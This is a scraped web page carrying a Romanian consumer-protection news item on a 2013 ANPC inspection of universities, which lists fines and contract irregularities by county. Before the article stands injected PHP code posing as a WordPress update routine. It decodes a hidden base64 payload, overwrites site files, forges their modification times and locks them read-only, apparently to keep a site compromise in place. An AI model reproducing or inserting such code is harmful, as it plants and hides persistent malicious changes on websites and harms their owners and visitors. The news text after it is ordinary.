$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } InfoCons te informeaza: A.N.P.C. a desfasurat o actiune de control in universitati – O noua atitudine

InfoCons-Protectia-Consumatorilor-Protectia-ConsumatoruluiIn perioada 31.10.2013 – 08.11.2013, Autoritatea Nationala pentru Protectia Consumatorilor a desfasurat o actiune tematica de verificare a respectarii prevederilor legale privind protectia consumatorilor la incheierea contractelor de studii de catre universitati.

– Au fost verificati 114 operatori economici.
– Au fost aplicate 11 amenzi contraventionale in valoare totala de 39.000 lei si  23 avertismente.

Abateri constatate:

1. Informarea consumatorilor
a) afisarea in mod vizibil a denumirii universitatii, a codului unic de inregistrare la Registrul Comertului din care sa rezulte obiectul/obiectele de activitate ale societatii pentru care este autorizata sa functioneze, precum si a programului de functionare;
b) existenta listelor cu tarife pentru cursurile/serviciile prestate;

– jud. Satu- Mare – nu era afisat codul unic de inregistrare la Registrul Comertului ;
– jud. Satu- Mare, Cluj – neconformitati cu privire la existenta listelor cu tarife, lipsa listei cu tarifele pentru anul 2013-2014 ;
– jud. Teleorman – nu erau afisate  listele cu tarife pentru cursurile / serviciile prestate ;
– jud. Sibiu – nu erau afisate listele cu tarife pentru cursuri /serviciile prestate.

2. Informarea precontractuala a consumatorilor cu privire la serviciile universitare prestate, in vederea incheierii contractului – (modalitatea de informare, tarifele si taxele practicate, discipline de studiu etc.)
– jud. Satu- Mare – studentii nu erau informati, in faza precontractuala, asupra tarifelor aplicate in anul universitar 2013-2014 ;
– jud. Neamt – lipsa din pliantele existente a unor  informatii: cuantumul si modalitatile de plata a taxei de scolarizare aferente anului I de studiu, precum si a cuantumului taxei de inscriere.

3. Existenta contractului de studii si respectarea prevederilor privind protectia consumatorilor 
– jud. Constanta- pana  la data controlului nu erau incheiate contractele de scolarizare cu studentii. Taxa de studii era incasata de  universitate  fara ca studentii sa aiba cunostinta de  clauzele contractuale. In urma actiunii tematice a inceput semnarea contractelor de scolarizare dintre universitate si studenti.
– jud. Timis- consumatorii nu beneficiaza de o redactare clara si precisa a clauzelor contractuale, indicarea exacta a preturilor si tarifelor.

4. Continutul contractului – informatii obligatorii:

– jud. Teleorman –  in cazul incetarii contractului prin denuntare unilaterala nu se specifica daca taxele platite de catre student in avans sunt restituite acestuia. De asemenea, in contracte nu se mentioneaza taxa de restanta, fiind mentionate taxa de scolarizare, taxa de admitere si taxa de inmatriculare;
– jud. Teleorman – nu sunt mentionate in contracte taxele percepute: taxa de admitere, taxa de inmatriculare, taxa de restanta si taxa de scolarizare.
– jud. Galati – nu se mentioneaza conditiile de restituire a taxei achitate in  cazul in care studentul renunta la activitatea universitara si solicita restituirea inainte de inceperea anului scolar, in coditiile in care erau obligati sa achite 30 % din taxa de studii la semnarea contractului.
– jud. Bihor – insusirea de catre studenti a regulamentelor interne, a programelor de studii si examene, fara a preciza faptul ca acestea se gasesc pe site-urile oficiale ale universitatilor respective.
– jud. Bihor – lipsa din contract a precizarilor privind existenta unei taxei de restanta si a cuantumului acesteia, lipsa explicita a taxelor pentru activitatile de invatamant ;
– jud. Arges – lipsa precizarii  legate de percepere a unei taxe de restante, conditiile in care aceasta se percepe precum si cuantumul ei ;
– jud. Arad – lipsa informarii corecte privind taxele de studii sau neincluderea tuturor taxelor si tarifelor percepute de universitate;
– jud.Mehedinti – contractele nu aveau numar si data de inregistrare.

6. Respectarea prevederilor Legii 193/2000 privind clauzele abuzive din contractele incheiate intre comercianti si consumatori

– jud. Teleorman – studentul era obligat sa declare ca este de acord ca in cazul retragerii de la facultate, indiferent de motiv, sa-i fie retinute o parte sau totalitatea sumelor platite in avans.
– jud. Neamt – taxele achitate catre universitate nu se returnau in nicio situatie.

Sursa: Autoritatea Nationala pentru Protectia Consumatorilor

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – InfoCons, unica organizatie din Romania cu drepturi depline in Consumers International, este o asociatie de consumatori neguvernamentala, reprezentativa, de drept privat, fara scop lucrativ, cu patrimoniu distinct si indivizibil, independenta, intemeiata pe principii democratice, ce apara drepturile consumatorilor.

By o9admin